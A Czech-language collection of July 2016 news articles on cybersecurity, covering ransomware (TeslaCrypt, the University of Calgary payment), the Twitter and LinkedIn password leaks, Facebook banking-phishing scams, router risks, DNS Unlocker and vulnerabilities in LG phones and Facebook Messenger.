Útoky jsou na chlup stejné
Rozeznat, jaký virus data uzamknul, přitom není vždy snadné – útoky totiž probíhají prakticky na chlup stejně. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.

Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.

Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné, což však nyní u TeslaCryptu neplatí.

Stahovat dešifrovací nástroj od společnosti Cisco, který si dovede poradit se všemi známými verzemi TeslaCryptu, je možné zde.


Routery jsou stále větší bezpečnostní slabinou internetu. Riziko útoků na ně stoupá

23.7.2016 Zdroj: Novinky/Bezpečnost Hrozby
Rájem pro hackery všeho druhu se stávají routery, jejichž prostřednictvím se k internetu připojuje stále větší počet mobilních zařízení.
Do roku 2020 bude díky Internetu věcí na routerech závislých přes 20 miliard zařízení na celém světě, na zabezpečení směrovačů ale většina uživatelů stále zapomíná. Z routerů se tak stává pověstný nejslabší článek internetu, jehož prostřednictvím může docházet k útokům jak na domácnosti, tak na firmy.

„Proniknout do routeru není pro útočníky o moc těžší než se dostat do počítače. Většinou totiž nebývají vůbec chráněny,“ říká Petr Šnajdr, bezpečnostní expert společnosti ESET.

Většina lidí zapomíná na routerech změnit přednastavené heslo.
Petr Šnajdr, bezpečnostní expert společnosti ESET
Drtivá většina domácích, ale překvapivě i firemních routerů využívá stejné nastavení, v jakém jej uživatelé získali a instalovali. Dokonce na nich bývají přednastavená jednoduchá hesla, která lze hravě odhadnout nebo prolomit.

Router je přitom bránou mezi veřejným internetem a soukromým počítačem, a neměl by tedy být tak snadným terčem útoku. Zvláště pak ve chvíli, kdy se jeho prostřednictvím k internetu připojují nejen počítače, ale i chytré mobilní telefony, tablety, notebooky a další inteligentní části domácnosti.

Stará hesla a neaktualizovaný firmware
Pohodlné ovládání inteligentního zámku se ale může změnit v noční můru ve chvíli, kdy díky nedostatečně zabezpečenému routeru útočník dveře na dálku odblokuje nebo zablokuje podle toho, zda chce dům vykrást nebo jeho obyvatele uvěznit uvnitř.

„Většina lidí zapomíná na routerech změnit přednastavené heslo a aktualizovat firmware, takže útočníkům velice usnadňují práci,“ konstatuje Petr Šnajdr. Vinni nejsou jen samotní uživatelé, chyba je i na straně výrobců routerů, kteří nevytvářejí automatické aktualizace, jež by tento problém částečně řešily.

Z průzkumu, který v roce 2015 spustila společnost ESET společně s National Cyber Security Alliance ve Spojených státech, vyplynulo, že téměř 80 procent Američanů má bezmeznou důvěru k bezpečnosti domovské sítě a zařízení, která jsou k ní napojena.

Zároveň však dvě z pěti amerických domácností přiznaly, že nikdy nezměnily přednastavená hesla u svých routerů zadaná v továrním nastavení. Stovky tisíc směrovačů jsou tak vystaveny bezprostřednímu kybernetickému útoku, při němž hacker může přesměrovávat vyhledávané internetové stránky na podvodné weby a pomocí takovýchto phishingových útoků získat přístup k online účtům uživatelů.

Routery lze zneužít k DDoS útokům
Hackeři rovněž mohou využít napadené routery pro masivní DDoS útoky, jako se to stalo o Vánocích 2015, kdy skupina označovaná Lizard Squad pomocí sítě desítky tisíc zneužitých routerů vyřadila internetové stránky společností Sony a Microsoft a znemožnila tak miliónům uživatelů vyzkoušet hry Xbox Live a PlayStation Network, které dostali pod stromeček. Lizard Squad se vyloženě specializuje na odhalování nezajištěných routerů s nezměněnými hesly z továrního nastavení a vytváří z nich síť robotů, kterou zneužívá k takovýmto masivním DDoS útokům.

„Hlavní obranu představuje upgrade firmwaru routeru na aktuální verzi a nepoužívání mnohdy triviálních přednastavených přihlašovacích údajů. Rovněž je vhodné zvážit omezení přihlašování k routeru pouze z vnitřní sítě, a nikoliv z internetu. Řada uživatelů tak přijde o komfortní správu routeru odkudkoli, na druhou stranu zabrání některým typům útoků,“ vypočítává Petr Šnajdr.

Pokud si uživatel není jist, zda je jeho router napaden, a eviduje neočekávané požadavky na stažení a aktualizaci nějakého softwaru, které by mohly představovat bezpečnostní hrozbu, stačí se jednoduše připojit k webu prostřednictvím mobilního připojení a zkontrolovat, zda se stejná výzva k instalaci zobrazí rovněž na mobilu. Pokud ne, router je zavirován.


Twitter uzamkl kvůli hackerskému útoku milióny účtů

27.7.2016 Zdroj: Novinky/Bezpečnost Sociální sítě
Velké překvapení bude čekat některé uživatele Twitteru při opětovném přihlášení. Zástupci této mikroblogovací sítě se totiž v souvislosti s nedávným únikem desítek miliónů hesel rozhodli milióny účtů z bezpečnostních důvodů uzamknout. Upozornil na to server Neowin.
Databáze s 32 888 300 hesly z Twitteru se prodávala už v minulém týdnu na černém internetovém trhu, jak Novinky.cz informovaly ve čtvrtek. 

Už tehdy server Leaked Source upozornil na to, že hesla s ohledem na velké množství patrně nepocházejí z nějakého velkého hackerského útoku na servery zmiňované mikroblogovací sítě. To nyní potvrdili i zástupci Twitteru.

Přesto jsou odcizená hesla pravá. Z největší pravděpodobností je počítačoví piráti nasbírali z nějakého škodlivého kódu, který byl navázán na internetový prohlížeč. To jinými slovy znamená, že použili malware, aby mohli hesla zachytávat přímo na klientských stanicích.

Uživatelé musí změnit heslo
Zástupci Twitteru se nyní rozhodli účty, které byly výše popsaným způsobem napadeny, zablokovat. Miliónům uživatelů se tak při dalším přihlášení ukáže výzva ke změně hesla, což je možné pouze s využitím e-mailové adresy, která byla použita při registraci na mikroblogovací síť.

Tím by se měla minimalizovat šance, že útočníci budou moci účty zneužít.

V případě, že stejné přihlašovací údaje uživatelé používají také na jiných službách – na e-mailu, sociálních sítích či například v internetových obchodech, měli by neprodleně změnit hesla i tam.

Krádeže hesel jsou stále častější
Na krádeže hesel se v poslední době specializuje internetové podsvětí stále častěji. Na černém internetovém trhu se nejprve v polovině května objevil balík 167 miliónů hesel z profesní sítě LinkedIn, pak 65 miliónů přihlašovacích údajů ze sítě Tumblr. 

Zkraje června pak zástupci sociální sítě MySpace potvrdili, že se hackeři dostali k více než 400 miliónům hesel.


Česká spořitelna varovala před podvodníky na Facebooku

27.7.2016 Zdroj: Novinky/Bezpečnost Sociální sítě
Sociální síť Facebook zneužívají podvodníci pravidelně. Tentokrát se zaměřili na klienty České spořitelny, kteří využívají internetové bankovnictví Servis24. Prostřednictvím falešného profilu se z důvěřivců snaží vylákat přihlašovací údaje. Na konci minulého týdne před tímto podvodem varovali zástupci banky.
Podvodný profil na Facebooku, prostřednictvím kterého počítačoví piráti lákají na novou verzi internetového bankovnictví.
Podvodný profil na Facebooku, prostřednictvím kterého počítačoví piráti lákají na novou verzi internetového bankovnictví.
Prakticky stejný trik zkoušeli počítačoví piráti už zkraje minulého týdne, jak Novinky.cz informovaly již dříve. 

Tehdy však odkaz na „novou verzi internetového bankovnictví“ šířili prostřednictvím reklamy na Facebooku. Nově si rovnou zřídili falešný profil Servis24, na kterém se vydávají za zaměstnance banky.

Lákají na bonus 300 Kč
Důvěřivce se podvodníci snaží nalákat na finanční bonus. „Udělali jsme nové internetové bankovnictví s přehlednějším nastavením a odesíláním plateb. Funguje na způsob toho starého, akorát má mnohem jednodušší ovládání. Navíc každý zákazník od nás dostane bonus 300 Kč,“ lákají falešní bankéři na Facebooku.

Součástí nabídky je i odkaz na falešný web. Ten sice vypadá jako služba Servis24, ale je na úplně jiném webu, jak je vidět na fotografii níže. Jde tedy o klasický phishingový podvod, prostřednictvím kterého se podvodníci snaží vylákat přihlašovací údaje uživatelů.

Podvodnou službu Servis24 je možné rozeznat podle špatné adresy v prohlížeči.
Podvodnou službu Servis24 je možné rozeznat podle špatné adresy v prohlížeči.
FOTO: Česká spořitelna

„Důrazně varujeme před jakoukoli reakcí na výzvy uvedené na tomto profilu. V žádném případě neklikejte na nabízený odkaz a svoje údaje nevyplňujte nikam jinam než na oficiální stránky www.servis24.cz . Podvodníci by se pak jejím prostřednictvím mohli dostat k Vašim penězům! V případě jakýchkoli pochybností nás kontaktujte na bezplatném telefonním čísle 800 207 207,“ uvedli zástupci České spořitelny.

Obezřetní by v případě podobných nabídek měli být také uživatelé jiných bankovních institucí. Není totiž vyloučeno, že stejný trik budou počítačoví piráti zkoušet příště pod hlavičkou úplně jiné společnosti.


Vznikne nový bezpečnostní gigant, Symantec koupí za 111 miliard korun Blue Coat

27.7.2016  Zdroj: Novinky/Bezpečnost Zabezpečení
Americký výrobce bezpečnostního softwaru Symantec Corp. koupí soukromou firmu zabývající se kybernetickou bezpečností Blue Coat za 4,65 miliardy USD (111,7 miliardy Kč). Dohoda výrazně posílí hodnotu bezpečnostních aktivit firmy Symantec, uvedla agentura Reuters.
Firma Blue Coat pomáhá chránit webové vstupní brány společností před kybernetickými útoky, což je služba, která doplní současnou nabídku produktů Symanteku pro velké společnosti. Symantec mimo jiné vyrábí antivirový software Norton.

Akvizice by měla být dokončena ve třetím čtvrtletí a bude mít okamžitě pozitivní vliv na hospodaření. Po dokončení akvizice budou mít na celkových příjmech Symanteku podíl 62 procent příjmy z bezpečnostních produktů pro firmy. Bude tak schopný lépe čelit konkurenci dalších firem, jako Networks Inc., FireEye Inc. a Check Point Software Technologies.

Převzetím Blue Coat vyřeší Symantec rovněž personální otázky. Generální ředitel Blue Coat Greg Clark se totiž stane generálním ředitelem Symanteku. Předchozí generální ředitel Michael Brown v dubnu po zveřejnění nepříznivých výsledků hospodaření odstoupil.


Na černém trhu se prodává více než 32 miliónů hesel z Twitteru

27.7.2016  Zdroj: Novinky/Bezpečnost  Sociální sítě
Na pozoru by se měli mít uživatelé Twitteru. Na černém internetovém trhu se totiž objevila databáze obsahující více než 32 miliónů přihlašovacích údajů z této mikroblogovací sítě. Uživatelé by si z preventivních důvodů měli změnit heslo. Upozornil na to ve čtvrtek server Tech Crunch.
Bezpečnostní experti Twitteru zatím únik dat nepotvrdili, data nabízená na černém trhu prý zatím ještě analyzují. „Snažíme se udržet účty v bezpečí, proto nyní usilovně kontrolujeme všechna data z údajného úniku, která máme k dispozici,“ prohlásili zástupci Twitteru.

Databáze má obsahovat přesně 32 888 300 záznamů. Konkrétně má jít o uživatelská přihlašovací jména a hesla.

Server Leaked Source upozornil na to, že hesla s ohledem na velké množství patrně nepocházejí z nějakého velkého hackerského útoku. Daleko pravděpodobnější je, že počítačoví piráti je nasbírali z nějakého škodlivého kódu, který byl navázán na internetový prohlížeč. To jinými slovy znamená, že použili malware, aby mohli hesla zachytávat přímo na klientských stanicích.

Týká se útok i Čechů?
Důležité je také podotknout, že velká část přihlašovacích údajů nabízených na černém trhu pochází z Ruska. Zda jsou v ohrožení také tuzemští uživatelé, zatím není jasné.

Několik miliónů odcizených údajů již stačili bezpečnostní experti ověřit. Zda byl jejich e-mailový účet napaden, si uživatelé mohou ověřit například na stránkách haveibeenpwned.com.

Samozřejmě tato metoda ověření není stoprocentní. Pokud bezpečnostní experti nezvládli ještě odcizená hesla zpracovat, v databázi se e-mailová schránka neobjeví.

Raději změnit hesla
Z bezpečnostních důvodů by si tak uživatelé dotčených e-mailových schránek měli pro jistotu změnit svá přihlašovací hesla, aby případným počítačovým pirátům nedali všanc svůj vlastní účet.

V případě, že stejné přihlašovací údaje používají uživatelé také na jiných službách – na e-mailu, sociálních sítích či například v internetových obchodech, měli by neprodleně změnit hesla i tam.

V posledních týdnech jde už o několikátý velký únik hesel. Na černém internetovém trhu se nejprve v polovině května objevil balík 167 miliónů hesel z profesní sítě LinkedIn, pak 65 miliónů přihlašovacích údajů ze sítě Tumblr. 

Zkraje června pak zástupci sociální sítě MySpace potvrdili, že se hackeři dostali k více než 400 miliónům hesel.


Vyděračský virus zablokoval stovku počítačů. Univerzita zaplatila výkupné půl miliónu

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Velkou čáru přes rozpočet udělali počítačoví piráti kanadské univerzitě v Calgary. Kyberzločincům se totiž podařilo nakazit více než stovku tamních PC vyděračským virem a za jejich zpřístupnění požadovali bezmála půlmiliónové výkupné. To vedení univerzity nakonec skutečně zaplatilo, upozornil server The Hacker News.
Vyděračský virus z rodiny ransomware infikoval podstatnou část univerzitního počítačového systému. Kromě desítek počítačů také některé servery, na kterých univerzita provozovala vlastní e-mailový systém.

V univerzitní síti si nezvaný návštěvník počínal úplně stejně, jako když útočí na počítače běžných uživatelů. Ne pevných discích tedy zašifroval data, přičemž za jejich opětovné zpřístupnění požadovali počítačoví piráti výkupné.

Zaplatit chtěli v bitcoinech
Nebyli přitom žádní troškaři. Za dešifrovací klíč chtěli zaplatit 40 bitcoinů, tedy v přepočtu více než 480 000 korun. Tuto virtuální měnu nezvolili kyberzločinci náhodou. Její pohyb se nedá vystopovat, a tak je prakticky nulová šance, že by mohli být vypátráni.

S ohledem na to, že byla zcela paralyzovaná e-mailová komunikace a že se univerzitní administrátoři nemohli dostat do jednotlivých PC, kde byla uložená důležitá data, rozhodlo se vedení univerzity požadavku hackerů vyhovět. Výkupné zaplatili.

Ve snaze o zachování všech důležitých systémů univerzita výkupné zaplatila.
Linda Dalgettyová z univerzity v Calgary
To přitom bezpečnostní experti několik posledních měsíců důrazně nedoporučují. Ani po zaplacení výkupného se totiž uživatelé ke svým datům nemusí dostat. Místo placení výkupného je nutné virus z počítače odinstalovat, k nezálohovaným datům se ale lidé zpravidla již nedostanou.

„Ve snaze o zachování všech důležitých systémů a vyřešení problémů univerzita výkupné týkající se útoku ransomwaru zaplatila,“ potvrdila Linda Dalgettyová, která na univerzitě v Calgary vede finanční oddělení. Žádné další podrobnosti však neprozradila.

Podle serveru The Hacker News nicméně již administrátoři dešifrovací klíč získali. V současnosti se s jeho pomocí již snaží obnovit zašifrovaná data a virus odstranit. Zda se jim to skutečně povede, však zatím není jasné.

V prohlášení zástupci univerzity pouze doplnili, že žádná osobní data studentů nebyla zneužita. Vedení školy prý spolupracuje s tamní policií a bude se snažit útočníky dopátrat.

Vyděračské viry se šíří jako lavina
Jak je z řádků výše patrné, kyberzločincům se nasazování vyděračských virů jednoznačně vyplácí. To je patrně jeden z hlavních důvodů, proč se po síti šíří doslova jako lavina. Na přelomu března a dubna dokonce bezpečnostní experti bili na poplach s tím, že škodlivých kódů požadujících výkupné dramaticky přibylo. 

Ostražití by před vyděračskými viry neměli být pouze majitelé klasických počítačů. Loni v červnu bezpečnostní experti odhalili nezvaného návštěvníka, který požadoval výkupné i na mobilním telefonu.


Podvodníci oprášili starý trik, na Facebooku lákají na bonus 1000 Kč

27.7.2016  Zdroj: Novinky/Bezpečnost Sociální sítě
Za zaměstnance České spořitelny se opět vydávají podvodníci na sociální síti Facebook. Lákají na novou verzi internetového bankovnictví Servis24, za vyzkoušení přitom nabízejí 1000 Kč. Ve skutečnosti se pouze snaží od důvěřivců vylákat přihlašovací údaje.
Ukázka podvodné reklamy na Facebooku
Ukázka podvodné reklamy na Facebooku
Prakticky nachlup stejný trik zkoušeli počítačoví piráti už letos v dubnu. Tehdy si kvůli tomu na Facebooku dokonce zřídili celý falešný profil. 

Nově to zkouší pomocí reklamy, která se na zmiňované sociální síti objevuje. „Přejděte na novou verzi internetového bankovnictví a získejte bonus 1000 Kč! Bezpečnější bankovnictví s přehlednějším rozvržením pro jednoduchou správu vašich financí,“ stojí v lákavě vyhlížející nabídce.

Obejít dokážou i potvrzovací SMS zprávy
Reklamu doplňuje odkaz, který samozřejmě směřuje na podvodné stránky, jejichž prostřednictvím se snaží kyberzločinci vylákat od důvěřivců přihlašovací údaje k internetovému bankovnictví. Vyplněním přihlašovacích údajů na podvodných stránkách se přitom lidé vystavují velkému riziku.

Počítačoví piráti jsou totiž už jen kousek od toho, aby jim mohli vybílit účet – stačí, aby propašovali virus na jejich chytrý telefon. Prostřednictvím něj pak budou schopni odchytávat potvrzovací SMS zprávy pro platby, jako tomu bylo už v minulosti. 

Ukázka jedné z podvodných SMS zpráv
Ukázka jedné z podvodných SMS zpráv, jejímž prostřednictvím se dokážou podvodníci dostat do chytrého telefonu.
FOTO: Česká spořitelna

Podvodné webové stránky servis25.ic.cz, kam reklama na Facebooku směřovala, jsou v současnosti již nefunkční. Kyberzločinci ale mohou jednoduše odkaz v reklamě změnit a zkoušet nachytat další lidi.

Zástupci České spořitelny před podobnými podvody varovali již dříve. „Důrazně varujeme před jakoukoli reakcí na podobné výzvy. V žádném případě neklikejte na nabízený odkaz a svoje údaje nevyplňujte nikam jinam než na oficiální stránky www.servis24.cz. Podvodníci by se pak jejich prostřednictvím mohli dostat k Vašim penězům,“ uvedli zástupci banky.

„V případě jakýchkoliv pochybností nás kontaktujte na bezplatném telefonním čísle 800 207 207,“ doplnili zástupci banky.

Obezřetní by v případě podobných nabídek měli být také uživatelé jiných bankovních institucí. Není totiž vyloučeno, že stejný trik budou počítačoví piráti zkoušet příště pod hlavičkou úplně jiné společnosti.


Šéf Facebooku hackerům usnadnil práci, na sociálních sítích používal primitivní heslo

27.7.2016  Zdroj: Novinky/Bezpečnost Sociální sítě
Prakticky všechna světová média v pondělí obletěla zpráva o tom, že účty na sociálních sítích šéfa Facebooku Marka Zuckerberga napadli hackeři. Ten ale počítačovým pirátům práci značně usnadnil, protože používal všude jedno stejné heslo. Jak upozornila britská stanice Sky News, bylo navíc velmi primitivní.
Bezpečnostní experti neustále kladou lidem na srdce, jak důležité je používat sofistikovaná hesla k ochraně svých on-line účtů. Jsou totiž zpravidla první linií účinné ochrany před odcizením citlivých osobních dat, například pro on-line bankovnictví nebo platby na internetu.

Je proto až s podivem, že tvůrce jedné z největších sociálních sítí na světě si tuto radu nevzal k srdci. Twitter, LinkedIn, Instagram a také Pinrest si totiž Zuckerberg chránil pomocí primitivního hesla „dadada“.

Jednoduše heslo vyzkoušeli
Na obranu šéfa Facebooku se sluší připomenout, že šlo o účty, které příliš nepoužíval. I přesto ale hackeři ze skupiny OurMine tento úlovek považovali za velmi cennou trofej, se kterou se prakticky okamžitě pochlubili na mikroblogovací síti Twitter. 

Účet hackerů ze skupiny OurMine na sociální síti Twitter.
Hackeři ze skupiny OurMine se pochlubili s cenným úlovkem na Twiteru. Jejich účet byl krátce poté zablokován.
Hackeři Zuckerbergovo heslo získali podle Sky News z ukradené databáze obsahující na 167 miliónů hesel k sociální síti LinkedIn. Ta se nabízela už od minulého měsíce k prodeji na černém internetovém trhu. 

V ní si jednoduše našli přihlašovací údaje šéfa Facebooku a vyzkoušeli je i na dalších účtech na internetu. To jinými slovy znamená, že dostat se na jeho účty na sociálních sítích by zvládli i v případě, kdyby používal sofistikovanější heslo.

Potvrdily se tak slova bezpečnostních expertů o tom, že uniklá databáze může představovat riziko i přesto, že k samotnému útoku na LinkedIn došlo již v roce 2012. Počítačovým pirátům se podařilo přihlašovací údaje zneužít i čtyři roky poté.

Pozor na jednoduchá hesla
Tento případ jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla pro každý účet zvlášť, ale alespoň jednou za pár měsíců je pravidelně měnit.

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.


Počítačoví piráti mohli na Facebooku měnit i mazat zprávy

27.7.2016 Zdroj: Novinky/Bezpečnost Sociální sítě
Velké nepříjemnosti mohli způsobit počítačoví piráti uživatelům Facebooku. Na této sociální síti totiž byla chyba, kterou mohli kyberzločinci zneužít k mazání nebo ke změnám zpráv, jež si uživatelé posílají mezi sebou. Upozornili na to bezpečnostní experti ze společnosti Check Point.
Chyba se týkala on-line chatu i oficiální mobilní aplikace Messenger, kterou Facebook svým uživatelům nabízí. „Zranitelnost umožňovala upravit nebo odstranit jakoukoli odeslanou zprávu, fotografii, soubor, odkaz a mnoho dalšího,“ prohlásil David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Podle něj kyberzločinci mohli zranitelnost zneužít k manipulaci s historií zpráv v rámci podvodných kampaní. „Útočník mohl změnit historii konverzace, a získat tak zfalšovanou dohodu s obětí nebo jednoduše změnit podmínky dohody,“ konstatoval Řeháček.

Kyberzločinci mohli šířit viry
Chyba mohla být samozřejmě zneužita také k distribuci škodlivých kódů. „Útočník mohl změnit legitimní odkaz nebo soubor na škodlivý a snadno přesvědčit uživatele ke kliknutí a otevření,“ podotkl Řeháček.

Měnit zprávy v chatu přitom standardně nemohou ani samotní uživatelé. Bezpečnostní experti proto zástupce sociální sítě o nově objevené chybě okamžitě informovali, díky čemuž mohla být prakticky okamžitě opravena.

Zda se kyberzločincům podařilo chybu zneužít ještě předtím, není zatím jasné.


Nový virus dokáže řídit internetový provoz. Zobrazuje reklamu a podvodné weby

27.7.2016  Zdroj: Novinky/Bezpečnost Viry
Bezpečnostní experti antivirové společnosti Eset varovali před novým virem zvaným DNS Unlocker, který na napadeném počítači dokáže v podstatě řídit internetový provoz a uživatele nasměrovat na podvodné webové stránky. Zároveň je obtěžuje nadměrným zobrazováním reklamy.
DNS servery jsou ve světě jedniček a nul velmi důležité, protože standardně překládají webové adresy na číselné adresy fyzických počítačů (IP adresy). Právě tyto záznamy dokáže ale nový nezvaný návštěvník měnit.

V praxi to znamená, že hackeři mohou s jeho pomocí přesměrovat uživatele na podvodné internetové stránky. Ve chvíli, kdy uživatel na infikovaném PC zadá do internetového prohlížeče například adresu www.yahoo.com, mohou jej kyberzločinci přesměrovat na jiné stránky.

Ty zpravidla vypadají skutečně jako web Yahoo, ale obsahují daleko více reklamy, za kterou inkasují peníze právě hackeři. A to aniž by uživatel cokoliv postřehl.

Nová hrozba je zákeřnější
DNS Unlocker je však ještě zákeřnější, protože zobrazuje i vyskakující okna na podvodné webové stránky. „DNS útoky nejsou tak destruktivní a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ konstatoval Petr Šnajdr, bezpečnostní expert společnosti Eset.

Podle něj je hlavní problém v tom, jak operační systém Windows pracuje s DNS adresami. „V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS,“ doplnil Šnajdr.

Pozor na administrátorská práva
Bezpečnostní experti se proto s nalezenou nákazou obrátili přímo na společnost Microsoft, respektive na bezpečnostní divizi Microsoft Security Response Center (MSRC), která má na starosti nově objevené zranitelnosti. Ta sice uznala, že jde o chybu, ale neklasifikovala ji jako vážnou, protože k útoku jsou zapotřebí administrátorská práva.

To jinými slovy znamená, že riziku se vystavují pouze ti uživatelé, kteří surfují na internetu s administrátorskými právy. V současnosti jde ale bohužel o běžnou praxi.

Z bezpečnostního hlediska je daleko vhodnější používat počítač k rutinním úkonům pouze z účtu běžného uživatele, nikoliv administrátora. Samozřejmostí by mělo být také používání aktualizovaného antivirového programu, který si bude schopný s podobnými hrozbami poradit.


Děsivé je tiché luxování dat, varuje kybernetický expert

27.7.2016 Zdroj: Novinky/Bezpečnost Hrozby
Světové mocnosti více než kdy předtím pomocí počítačových sítí šmírují data o vládních institucích, energetice, továrnách i komunikačních systémech. Občas chaos řízený na dálku někde lokálně vyzkoušejí. Je to zlatá éra pro hackery. Firmy s vládami se o ně přetahují. Chybějí však tisíce specialistů, kterým by se dalo věřit.
Vyplývá to z rozhovoru Práva s předním expertem na počítačovou kriminalitu, 58letým Alešem Špidlou. Je otcem národní kybernetické bezpečnostní strategie, pracoval na ministerstvu vnitra a dnes působí v řízení rizik u českého zastoupení globální poradenské společnosti PricewaterhouseCoopers (PwC).

Podle něj je až děsivé, s jakou intenzitou se dnes tiše sbírají data o citlivé infrastruktuře.

Citlivé nemocnice
„Pořádkumilovní Němci nedávno našli v informačních systémech jaderné elektrárny dva viry, které tam podle všeho nenápadně šmírovaly několik let. Jeden z těch virů byl nejaktivnější v roce 2008 a v elektrárně ho našli až nyní. Komu posílal informace a jaké? Jediné, co se ví, je, že aktivně odesílal informace. Někam,“ popisuje Špidla.

Stále častější jsou i útoky na systémy, které řídí nejrůznější technologie v průmyslu. „Před časem hackeři napadli v Německu systémy pro řízení vysoké pece. Stala se neřiditelná a musela být odstavena,“ poukazuje Špidla na další případ.

Kybernetický útok může snadno rozkolísat společnost, znevěrohodnit vládní instituce. „Stačí na několik týdnů zablokovat systém pro výplatu sociálních dávek. Nejcitlivější je ovšem energetika, plynovody, vodárenství, informační systémy. Do kritické infrastruktury se nejspíše brzy zahrnou zdravotnická zařízení. Budou muset přijímat nová bezpečnostní opatření,“ řekl Špidla.

Na nemocnice s milióny citlivých údajů si brousí zuby i organizovaný zločin. „Nedávno hackeři zablokovali databázi pacientů v nemocnici v USA. Chtěli výpalné a nemocnice ho zaplatila,“ připomíná americký právník a partner české PwC Legal Michael Mullen.

Semeništěm hackerů ovšem podle Špidly i Mullena bývají státy sponzorované skupiny.

„V Číně je jedna celá vojenská divize, která se věnuje kybernetickému boji, špionáži. I s podpůrnými jednotkami, ať už oficiálními nebo neoficiálními, se jedná asi o padesát tisíc lidí. O Rusku se říká, že jen někde ve Voroněži sedí kolem dvanácti tisíc odborníků, kteří provádějí hackerské aktivity pro stát. Stopy závažných událostí, jako jsou kybernetické útoky v Gruzii a Estonsku, vedou do Ruska,“ shrnuje Špidla. Na hackerských fórech si podle něj bez ruštiny skoro neškrtnete.

Izraelci pomáhají vycvičit Čechy
Hackeři přesměrovali například tok plynu v plynovodu z Ázerbájdžánu tak, aby šel přes Rusko. Čtrnáct dní trvalo, než se to podařilo vrátit zpátky.

„Než začne opravdová válka, je výhodné vyvolat chaos. Několik týdnů před konfliktem v Gruzii měl prezident totálně zmatené webové stránky, selhávaly informační a komunikační systémy státní správy. Do takovéhoto chaosu není těžké vjet s tanky,“ vysvětluje Špidla.

Potíž při hledání lidí na kyberochranu státu je loajalita. „Dobré to mají v Izraeli, kde se lidé znají z armády a nemají problém v případě potřeby pracovat pro oficiální struktury. Je velmi dobře, že Česko uzavřelo s Izraelem smlouvu o sdílení informací, týkající se kybernetické bezpečnosti. Jsou vycvičeni neustálým bojem,“ tvrdí Špidla.

Izraelci se podle něj podíleli na vzniku kybernetického výcvikového centra CyberGym v Řitce u Prahy. Zde se cvičí policisté v nedávno ustanoveném týmu proti kybernetické kriminalitě.

„Naše policie disponuje kvalitními odborníky, ale je jich málo. Je problém sehnat počítačové specialisty do těchto složek. Soukromá sféra tyto specialisty platí úplně jinak. Odborníků na počítačovou bezpečnost je ale celosvětově málo. Například FBI má na to speciální program: hackerům předkládá velmi zajímavé nabídky, aby je přemluvil ke spolupráci,“ uvedl Špidla.


Mobily od LG mají nebezpečné trhliny. Útočníci mohou měnit SMS zprávy

27.7.2016  Zdroj: Novinky/Bezpečnost Mobilní
Dvě nebezpečné trhliny byly odhaleny v chytrých telefonech od společnosti LG. Útočníci je mohli zneužít k tomu, aby měnili znění doručených SMS zpráv, nebo na dálku převzali kontrolu nad napadeným přístrojem. Na zranitelnosti upozornili bezpečnostní analytici ze společnosti Check Point.
Počítačoví piráti neustále hledají nové cesty, jak se lidem dostat do počítače. Propašovat škodlivé kódy se přitom stále častěji snaží také do mobilů a tabletů.
Do mobilních zařízení se snaží kyberzločinci dostat prakticky stejným způsobem jako do klasických počítačů. Hledají chyby v nejrůznějších aplikacích a operačních systémech, které by jim dovolily propašovat záškodníka na cizí přístroj.
Hackeři také spoléhají na to, že uživatelé rizika podceňují. Na klasických počítačích provozuje antivirový program prakticky každý, u mobilů a tabletů tomu tak ale není. Počítačovým pirátům tak nic nestojí v cestě.
pondělí 6. června 2016, 12:02
Chyby se týkají výhradně telefonů od LG s operačním systémem Android. Patrně jsou tedy obsaženy v nějakém doplňkovém softwaru, který tento výrobce do svých přístrojů instaluje.

„První zranitelnost umožňuje škodlivé aplikaci nainstalované na LG zařízení zneužít přístup k oprávněním, zvýšit práva útočníků a získat větší kontrolu nad zařízením,“ varoval David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Podle něj představuje velké riziko také druhá objevená zranitelnost. „Ta umožňuje vzdálenému útočníkovi smazat nebo upravit přijaté SMS zprávy na zařízení. Tento postup by mohl být zneužit například jako součást phishingového útoku a krádežím přihlašovacích údajů nebo k instalaci škodlivých aplikací,“ doplnil Řeháček.

Bezpečnostní experti nicméně upozornili na obě zranitelnosti společnost LG ještě před jejich odhalením. V současnosti jsou tak pro chyby již k dispozici záplaty, které lidé mohou ve svých mobilních přístrojích stahovat prostřednictvím automatických aktualizací systému.

S ohledem na možná rizika by uživatelé s instalací rozhodně neměli otálet.

Škodlivých kódů pro mobily přibývá
V posledních měsících se zaměřují počítačoví piráti na mobilní zařízení stále častěji. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl Řeháček.

Podle něj dělá bezpečnostním expertům v současnosti velké vrásky na čele především hrozba zvaná HummingBad. 

HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.


Získali jsme přístup na účty šéfa Facebooku, pochlubili se hackeři

27.7.2016  Zdroj: Novinky/Bezpečnost Sociální sítě
Účty na sociálních sítích zakladatele a šéfa Facebooku Marka Zuckerberga si vzali na mušku hackeři ze skupiny OurMine. Podle jejich prohlášení se jim podařilo proniknout na Zuckerbergův Twitter, LinkedIn, Instagram a také na Pinrest.
